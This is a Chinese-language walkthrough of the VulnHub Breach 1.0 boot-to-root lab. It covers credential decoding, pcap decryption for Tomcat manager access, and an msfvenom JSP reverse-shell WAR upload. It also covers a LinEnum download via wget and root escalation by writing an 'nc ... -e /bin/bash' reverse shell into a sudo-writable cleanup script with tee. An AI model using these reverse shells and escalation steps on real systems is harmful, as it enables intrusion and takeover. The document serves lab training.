Vulnhub Breach1.0
1、靶机信息
下载链接
https://download.vulnhub.com/breach/Breach-1.0.zip
靶机说明
Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。
VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢
Knightmare和rastamouse进行测试和提供反馈。作者期待大家写出文章,特别是通过非预期的方式获取root权限。
目标
Boot to root:获得root权限,查看flag。
运行环境
靶机:网络连接方式设置为主机模式(host-only),静态IP是192.168.110.140。
攻击机:同网段下有Windows攻击机(物理机),IP地址:192.168.110.20,使用Kali Linux攻击机。
2、信息收集
nmap 扫一波发现都是开放的端口,显然不靠谱,看一下访问一下http,开始渗透吧
3、漏洞挖掘
3.1 获取 CMS的密码:
访问http,查看源码发现两个点:
1、第19行链接到initech.html
2、第23行两次base64进行解密得到:pgibbons:damnitfeel$goodtobeagang$ta
root@kali:~# echo "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo" | base64 -d | base64 -d pgibbons:damnitfeel$goodtobeagang$tar
3.2 访问impress cms
使用pgibbons:damnitfeel$goodtobeagang$ta登录http://192.168.110.140/impresscms/user.php
收集信息:
http://192.168.110.140/impresscms/modules/banners/ 可浏览目录 Apache版本 2.4.7 服务器 Ubuntu
两个意思的文件:keystore、pcap
keystore
keystore(Inbox-ImpressCMS Admin-192.168.110.140/.keystore Bob)
第1封邮件:
主要内容:让你的团队只能向管理门户发布任何敏感的内容。我的密码非常安全,发自ImpressCMS Admin Bill。
第2封邮件:
主要内容:Michael采购了IDS/IPS。
第3封邮件:
主要内容:有一个peter的SSL证书被保存在192.168.110.140/.keystore。
PS:
keystore是存储公私密码的一种文件格式
pcap
_SSL_test_phase1.pcap(Home-Content-SSL implementation test capture)
me the alias, storepassword and keypassword are all set to 'tomcat'
提示 别名、存储密码和密钥密码都设置为“tomcat”
3.3 得到Tomcat后台
由keystore和pcap等到tomcat后台
获取pcap的时候,提示SSL 证书的 别名、存储密码和密钥密码 都是tomcat
然后keystore又根据邮件提示存储了SSL的证书,所以先从keystore中获取SSL的证书,然后用SSL证书解密pcap得到Tomcat后台
keytool
root@kali:~##查看keystore这个密钥库里面的所有证书 root@kali:~# keytool -list -keystore ./下载/keystore 输入密钥库口令: tomcat 密钥库类型: JKS 密钥库提供方: SUN 您的密钥库包含 1 个条目 tomcat, 2016-5-21, PrivateKeyEntry, 证书指纹 (SHA1): D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53 root@kali:~##从密钥库导出.p12证书 root@kali:~# keytool -importkeystore -srckeystore ./下载/keystore -destkeystore ./tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat 输入目标密钥库口令: tomcat 再次输入新口令: tomcat 输入源密钥库口令: tomcat root@kali:~#
SSL证书解密pcap
root@kali:~/下载# ngrep -I _SSL_test_phase1.pcap input: _SSL_test_phase1.pcap # U 192.168.110.1:51260 -> 192.168.110.255:32412 M-SEARCH * HTTP/1.1.. # U 192.168.110.1:51265 -> 192.168.110.255:32414 M-SEARCH * HTTP/1.1.. #### T 192.168.110.129:60149 -> 192.168.110.140:8443 [AP] ...........n..>K...&..Z...0..7../|.fBym........+./...............3.2.E.9.8...../.A.5...........B........................#..3t.................... ................. ## root@kali:~/下载##看到了-192.168.110.140:8443 [AP] root@kali:~/下载# ngrep -i nethunter -I _SSL_test_phase1.pcap input: _SSL_test_phase1.pcap match: nethunter ############################################################################### U 192.168.110.129:38030 -> 192.168.110.1:53 q............www.nethunter.com..... # U 192.168.110.129:38030 -> 192.168.110.1:53 .............www.nethunter.com..... ########exit root@kali:~/下载# ngrep -I _SSL_test_phase1.pcap -Wbyline ‘HTTP’ input: _SSL_test_phase1.pcap match: ‘HTTP’ ########################################################################################exit root@kali:~/下载# tcpick -C -yP -r _SSL_test_phase1.pcap Starting tcpick 0.2.1 at 2018-10-25 11:31 CST Timeout for connections is 600 tcpick: reading from _SSL_test_phase1.pcap M-SEARCH * HTTP/1.1 M-SEARCH * HTTP/1.1 1 SYN-SENT 192.168.110.129:60149 > 192.168.110.140:8443 1 SYN-RECEIVED 192.168.110.129:60149 > 192.168.110.140:8443 1 ESTABLISHED 192.168.110.129:60149 > 192.168.110.140:8443 ...........n..>K...&..Z...0..7../|.fBym........+./. . ...........3.2.E.9.8...../.A.5... root@kali:~/下载# tcpdump -qns 0 -X -r _SSL_test_phase1.pcap reading from file _SSL_test_phase1.pcap, link-type EN10MB (Ethernet) 00:56:50.635257 IP 192.168.110.1.51260 > 192.168.110.255.32412: UDP, length 21 0x0000: 4500 0031 49f4 0000 8011 9276 c0a8 6e01 E..1I......v..n. 0x0010: c0a8 6eff c83c 7e9c 001d e44a 4d2d 5345 ..n..<~....JM-SE 0x0020: 4152 4348 202a 2048 5454 502f 312e 310d ARCH.*.HTTP/1.1. 0x0030: 0a . 00:56:50.635479 IP 192.168.110.1.51265 > 192.168.110.255.32414: UDP, length 21 0x0000: 4500 0031 49f5 0000 8011 9275 c0a8 6e01 E..1I......u..n. 0x0010: c0a8 6eff c841 7e9e 001d e443 4d2d 5345 ..n..A~....CM-SE 0x0020: 4152 4348 202a 2048 5454 502f 312e 310d ARCH.*.HTTP/1.1. 0x0030: 0a . 00:56:51.649313 IP 192.168.110.129.60149 > 192.168.110.140.8443: tcp 0 0x0000: 4500 003c eaee 4000 4006 f16e c0a8 6e81 E..<..@.@..n..n. 0x0010: c0a8 6e8c eaf5 20fb 3032 2547 0000 0000 ..n.....02%G.... 0x0020: a002 7210 5e8d 0000 0204 05b4 0402 080a ..r.^........... 0x0030: 0275 cfa9 0000 0000 0103 030a .u.......... 00:56:51.649650 IP 192.168.110.140.8443 > 192.168.110.129.60149: tcp 0 0x0000: 4500 003c 0000 4000 4006 dc5d c0a8 6e8c E..<..@.@..]..n. 0x0010: c0a8 6e81 20fb eaf5 870c 8eca 3032 2548 ..n.........02%H 0x0020: a012 7120 c50b 0000 0204 05b4 0402 080a ..q............. 0x0030: 0041 69c3 0275 cfa9 0103 0307 .Ai..u...... 00:56:51.649667 IP 192.168.110.129.60149 > 192.168.110.140.8443: tcp 0 0x0000: 4500 0034 eaef 4000 4006 f175 c0a8 6e81 E..4..@.@..u..n. 0x0010: c0a8 6e8c eaf5 20fb 3032 2548 870c 8ecb ..n.....02%H.... 0x0020: 8010 001d 5e85 0000 0101 080a 0275 cfa9 ....^........u.. 0x0030: 0041 69c3 .Ai. root@kali:~/下载# tshark -r _SSL_test_phase1.pcap Running as user "root" and group "root". This could be dangerous. tshark: Lua: Error during loading: [string "/usr/share/wireshark/init.lua"]:44: dofile has been disabled due to running Wireshark as superuser. See https://wiki.wireshark.org/CaptureSetup/CapturePrivileges for help in running Wireshark as an unprivileged user. 1 0.000000 192.168.110.1 → 192.168.110.255 UDP 63 51260 → 32412 Len=21 2 0.000222 192.168.110.1 → 192.168.110.255 UDP 63 51265 → 32414 Len=21 3 1.014056 192.168.110.129 → 192.168.110.140 TCP 74 60149 → 8443 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=41275305 TSecr=0 WS=1024 4 1.014393 192.168.110.140 → 192.168.110.129 TCP 74 8443 → 60149 [SYN, ACK] Seq=0 Ack=1 Win=28960 Len=0 MSS=1460 SACK_PERM=1 TSval=4286915 TSecr=41275305 WS=128 5 1.014410 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=1 Ack=1 Win=29696 Len=0 TSval=41275305 TSecr=4286915 6 1.014675 192.168.110.129 → 192.168.110.140 SSL 228 Client Hello 7 1.015391 192.168.110.140 → 192.168.110.129 TCP 66 8443 → 60149 [ACK] Seq=1 Ack=163 Win=28800 Len=0 TSval=4286915 TSecr=41275305 8 1.015909 192.168.110.140 → 192.168.110.129 TLSv1.2 1057 Server Hello, Certificate, Server Hello Done 9 1.015916 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=163 Ack=992 Win=31744 Len=0 TSval=41275305 TSecr=4286915 10 1.026804 192.168.110.129 → 192.168.110.140 TLSv1.2 376 Client Key Exchange, Change Cipher Spec, Finished 11 1.034921 192.168.110.140 → 192.168.110.129 TLSv1.2 72 Change Cipher Spec 12 1.034938 192.168.110.140 → 192.168.110.129 TLSv1.2 103 Finished 13 1.034973 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=473 Ack=1035 Win=31744 Len=0 TSval=41275310 TSecr=4286920 14 1.035146 192.168.110.129 → 192.168.110.140 HTTP 1338 GET /_M@nag3Me/html HTTP/1.1 15 1.073510 192.168.110.140 → 192.168.110.129 TCP 66 8443 → 60149 [ACK] Seq=1035 Ack=1745 Win=27392 Len=0 TSval=4286930 TSecr=41275310 16 1.101009 192.168.110.140 → 192.168.110.129 TLSv1.2 3039 [SSL segment of a reassembled PDU] 17 1.101034 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=1745 Ack=4008 Win=37888 Len=0 TSval=41275326 TSecr=4286936 18 1.101477 192.168.110.140 → 192.168.110.129 HTTP 92 HTTP/1.1 401 Unauthorized (text/html) 19 1.138007 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=1745 Ack=4034 Win=37888 Len=0 TSval=41275336 TSecr=4286936 20 3.798191 192.168.110.129 → 192.168.110.1 DNS 84 Standard query 0x879b A www.kali.org.localdomain 21 3.798256 192.168.110.129 → 192.168.110.1 DNS 84 Standard query 0xd8c9 AAAA www.kali.org.localdomain 22 3.798296 192.168.110.129 → 192.168.110.1 DNS 86 Standard query 0x0b03 A tools.kali.org.localdomain 23 3.798322 192.168.110.129 → 192.168.110.1 DNS 86 Standard query 0xb495 AAAA tools.kali.org.localdomain 24 3.798355 192.168.110.129 → 192.168.110.1 DNS 98 Standard query 0xc7d8 A www.offensive-security.com.localdomain 25 3.798380 192.168.110.129 → 192.168.110.1 DNS 98 Standard query 0x906a AAAA www.offensive-security.com.localdomain 26 4.374997 192.168.110.129 → 192.168.110.140 HTTP 1397 GET /_M@nag3Me/html HTTP/1.1 27 4.375200 192.168.110.140 → 192.168.110.129 TCP 66 8443 → 60149 [ACK] Seq=4034 Ack=3076 Win=26112 Len=0 TSval=4287755 TSecr=41276145 28 4.419784 192.168.110.140 → 192.168.110.129 TCP 14546 [TCP segment of a reassembled PDU] 29 4.419808 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=3076 Ack=18514 Win=66560 Len=0 TSval=41276156 TSecr=4287766 30 4.420737 192.168.110.140 → 192.168.110.129 TLSv1.2 96 [SSL segment of a reassembled PDU] 31 4.420743 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=3076 Ack=18544 Win=66560 Len=0 TSval=41276156 TSecr=4287766 32 4.421745 192.168.110.140 → 192.168.110.129 HTTP 92 HTTP/1.1 200 OK (text/html) 33 4.421751 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=3076 Ack=18570 Win=66560 Len=0 TSval=41276156 TSecr=4287766 34 4.478550 192.168.110.129 → 192.168.110.140 HTTP 1525 GET /_M@nag3Me/images/asf-logo.gif HTTP/1.1 35 4.479304 192.168.110.140 → 192.168.110.129 TCP 66 8443 → 60149 [ACK] Seq=18570 Ack=4535 Win=25216 Len=0 TSval=4287781 TSecr=41276171 36 4.479828 192.168.110.129 → 192.168.110.140 TCP 74 60150 → 8443 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=41276171 TSecr=0 WS=1024 37 4.480803 192.168.110.140 → 192.168.110.129 TCP 74 8443 → 60150 [SYN, ACK] Seq=0 Ack=1 Win=28960 Len=0 MSS=1460 SACK_PERM=1 TSval=4287781 TSecr=41276171 WS=128 38 4.480816 192.168.110.129 → 192.168.110.140 TCP 66 60150 → 8443 [ACK] Seq=1 Ack=1 Win=29696 Len=0 TSval=41276171 TSecr=4287781 39 4.480954 192.168.110.129 → 192.168.110.140 SSL 260 Client Hello 40 4.481820 192.168.110.140 → 192.168.110.129 TCP 66 8443 → 60150 [ACK] Seq=1 Ack=195 Win=30080 Len=0 TSval=4287781 TSecr=41276171 41 4.486811 192.168.110.140 → 192.168.110.129 TLSv1.2 152 Server Hello 42 4.486820 192.168.110.129 → 192.168.110.140 TCP 66 60150 → 8443 [ACK] Seq=195 Ack=87 Win=29696 Len=0 TSval=41276173 TSecr=4287783 43 4.486962 192.168.110.140 → 192.168.110.129 TLSv1.2 72 Change Cipher Spec 44 4.486968 192.168.110.129 → 192.168.110.140 TCP 66 60150 → 8443 [ACK] Seq=195 Ack=93 Win=29696 Len=0 TSval=41276173 TSecr=4287783 45 4.487315 192.168.110.140 → 192.168.110.129 TLSv1.2 103 Finished 46 4.487323 192.168.110.129 → 192.168.110.140 TCP 66 60150 → 8443 [ACK] Seq=195 Ack=130 Win=29696 Len=0 TSval=41276173 TSecr=4287783 47 4.487438 192.168.110.129 → 192.168.110.140 TLSv1.2 109 Change Cipher Spec, Finished 48 4.491327 192.168.110.140 → 192.168.110.129 HTTP 210 HTTP/1.1 304 Not Modified 49 4.491343 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=4535 Ack=18714 Win=69632 Len=0 TSval=41276174 TSecr=4287784 50 4.526361 192.168.110.140 → 192.168.110.129 TCP 66 8443 → 60150 [ACK] Seq=130 Ack=238 Win=30080 Len=0 TSval=4287793 TSecr=41276173 51 4.590181 192.168.110.129 → 192.168.110.140 HTTP 1523 GET /_M@nag3Me/images/tomcat.gif HTTP/1.1 52 4.590411 192.168.110.140 → 192.168.110.129 TCP 66 8443 → 60150 [ACK] Seq=130 Ack=1695 Win=28672 Len=0 TSval=4287809 TSecr=41276199 53 4.591910 192.168.110.140 → 192.168.110.129 HTTP 210 HTTP/1.1 304 Not Modified 54 4.610733 192.168.110.129 → 192.168.110.140 HTTP 1335 GET /favicon.ico HTTP/1.1 55 4.612935 192.168.110.140 → 192.168.110.129 HTTP 1210 HTTP/1.1 404 Not Found (text/html) 56 4.612947 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=5804 Ack=19858 Win=72704 Len=0 TSval=41276204 TSecr=4287814 57 4.629950 192.168.110.129 → 192.168.110.140 TCP 66 60150 → 8443 [ACK] Seq=1695 Ack=274 Win=30720 Len=0 TSval=41276209 TSecr=4287809 58 5.000331 192.168.110.1 → 192.168.110.255 UDP 63 51260 → 32412 Len=21 59 5.000804 192.168.110.1 → 192.168.110.255 UDP 63 51265 → 32414 Len=21 60 6.804832 192.168.110.129 → 192.168.110.140 HTTP 1382 GET /cmd/ HTTP/1.1 61 6.806695 192.168.110.140 → 192.168.110.129 HTTP 1196 HTTP/1.1 404 Not Found (text/html) 62 6.806710 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=7120 Ack=20988 Win=75776 Len=0 TSval=41276753 TSecr=4288363 63 6.936350 192.168.110.1 → 239.255.255.250 SSDP 215 M-SEARCH * HTTP/1.1 64 6.936361 192.168.110.1 → 239.255.255.250 SSDP 215 M-SEARCH * HTTP/1.1 65 8.803369 192.168.110.129 → 192.168.110.1 DNS 84 Standard query 0x879b A www.kali.org.localdomain 66 8.803477 192.168.110.129 → 192.168.110.1 DNS 84 Standard query 0xd8c9 AAAA www.kali.org.localdomain 67 8.803556 192.168.110.129 → 192.168.110.1 DNS 86 Standard query 0x0b03 A tools.kali.org.localdomain 68 8.803608 192.168.110.129 → 192.168.110.1 DNS 86 Standard query 0xb495 AAAA tools.kali.org.localdomain 69 8.803663 192.168.110.129 → 192.168.110.1 DNS 98 Standard query 0xc7d8 A www.offensive-security.com.localdomain 70 8.803713 192.168.110.129 → 192.168.110.1 DNS 98 Standard query 0x906a AAAA www.offensive-security.com.localdomain 71 9.770143 192.168.110.129 → 192.168.110.140 HTTP 1335 GET /cmd/cmd.jsp HTTP/1.1 72 9.778658 192.168.110.140 → 192.168.110.129 HTTP 472 HTTP/1.1 200 OK (text/html) 73 9.778679 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=8389 Ack=21394 Win=77824 Len=0 TSval=41277496 TSecr=4289106 74 10.000381 192.168.110.1 → 192.168.110.255 UDP 63 51260 → 32412 Len=21 75 10.000394 192.168.110.1 → 192.168.110.255 UDP 63 51265 → 32414 Len=21 76 13.739966 192.168.110.129 → 192.168.110.140 HTTP 1438 GET /cmd/cmd.jsp?cmd=id HTTP/1.1 77 13.754746 192.168.110.140 → 192.168.110.129 HTTP 466 HTTP/1.1 200 OK (text/html) 78 13.754774 192.168.110.129 → 192.168.110.140 TCP 66 60149 → 8443 [ACK] Seq=9761 Ack=21794 Win=80896 Len=0 TSval=41278490 TSecr=4290100 79 13.806812 192.168.110.129 → 192.168.110.1 DNS 77 Standard query 0x71c0 A www.nethunter.com 80 13.806867 192.168.110.129 → 192.168.110.1 DNS 77 Standard query 0x8ec8 AAAA www.nethunter.com 81 13.806956 192.168.110.129 → 192.168.110.1 DNS 78 Standard query 0xa17c A www.exploit-db.com 82 13.806986 192.168.110.129 → 192.168.110.1 DNS 78 Standard query 0x4e6a AAAA www.exploit-db.com 83 13.807066 192.168.110.129 → 192.168.110.1 DNS 76 Standard query 0xe5e7 A www.facebook.com 84 13.807095 192.168.110.129 → 192.168.110.1 DNS 76 Standard query 0xe26b AAAA www.facebook.com 85 14.590232 192.168.110.129 → 192.168.110.140 TCP 66 [TCP Keep-Alive] 60150 → 8443 [ACK] Seq=1694 Ack=274 Win=30720 Len=0 TSval=41278699 TSecr=4287809 86 14.590472 192.168.110.140 → 192.168.110.129 TCP 66 [TCP Keep-Alive ACK] 8443 → 60150 [ACK] Seq=274 Ack=1695 Win=28672 Len=0 TSval=4290309 TSecr=41276209 87 15.000596 192.168.110.1 → 192.168.110.255 UDP 63 51260 → 32412 Len=21 88 15.001155 192.168.110.1 → 192.168.110.255 UDP 63 51265 → 32414 Len=21 root@kali:~/下载# tshark -r _SSL_test_phase1.pcap | grep -i get Running as user "root" and group "root". This could be dangerous. tshark: Lua: Error during loading: [string "/usr/share/wireshark/init.lua"]:44: dofile has been disabled due to running Wireshark as superuser. See https://wiki.wireshark.org/CaptureSetup/CapturePrivileges for help in running Wireshark as an unprivileged user. 14 1.035146 192.168.110.129 → 192.168.110.140 HTTP 1338 GET /_M@nag3Me/html HTTP/1.1 26 4.374997 192.168.110.129 → 192.168.110.140 HTTP 1397 GET /_M@nag3Me/html HTTP/1.1 34 4.478550 192.168.110.129 → 192.168.110.140 HTTP 1525 GET /_M@nag3Me/images/asf-logo.gif HTTP/1.1 51 4.590181 192.168.110.129 → 192.168.110.140 HTTP 1523 GET /_M@nag3Me/images/tomcat.gif HTTP/1.1 54 4.610733 192.168.110.129 → 192.168.110.140 HTTP 1335 GET /favicon.ico HTTP/1.1 60 6.804832 192.168.110.129 → 192.168.110.140 HTTP 1382 GET /cmd/ HTTP/1.1 71 9.770143 192.168.110.129 → 192.168.110.140 HTTP 1335 GET /cmd/cmd.jsp HTTP/1.1 76 13.739966 192.168.110.129 → 192.168.110.140 HTTP 1438 GET /cmd/cmd.jsp?cmd=id HTTP/1.1
tomcat:Tt\5D8F(#!*u=G)4m7zB
登录Tomcat
https://192.168.110.140:8443/_M@nag3Me/html
tomcat:Tt\5D8F(#!*u=G)4m7zB
在此之后我决定查看两个GIF,并且由于使用了密码套件而访问该网站时出现问题,
进入about:config并添加字符串security.tls.insecure_fallback_hosts 192.168.110.140做了诀窍
3.4 Tomcat上传木马
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.23 LPORT=443 -f war > breach.war
python -m SimpleHTTPServer LinEnum.sh cd /tmp wget http://192.168.110.20:8000/LinEnum.sh chmod LinEnum.sh ./LinEnum.sh mysql -u root -p use mysql; select User,Password from user; milton | 6450d89bd3aff1d893b85d3ad65d2ec2 在线MD5解码:thelaststraw milton:thelaststraw su - milton:thelaststraw sudo -l
4、 提升权限
ngrep -I _SSL_test_phase1.pcap
ngrep -i nethunter -I _SSL_test_phase1.pcap
ngrep -I _SSL_test_phase1.pcap -Wbyline ‘HTTP’
tcpick
tcpick -C -yP -r _SSL_test_phase1.pcap
tcpdump
tcpdump -qns 0 -X -r _SSL_test_phase1.pcap
tshark
tshark -r _SSL_test_phase1.pcap
tshark -r _SSL_test_phase1.pcap | grep -i get
5.3 火狐访问tls
进入about:config并添加字符串security.tls.insecure_fallback_hosts 192.168.110.140
代理 所有协议 访问8080
5.4 生成木马
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.23 LPORT=443 -f war > breach.war
5.5 python搭建简单web
python -m SimpleHTTPServer
5.6 python解决无法su
python -c
'import pty;pty.spawn("/bin/bash")'
5.7 用tee进行提权
echo
"nc 192.168.110.20 4445 -e /bin/bash"
|
sudo
/usr/bin/tee
/usr/share/cleanup/tidyup
.sh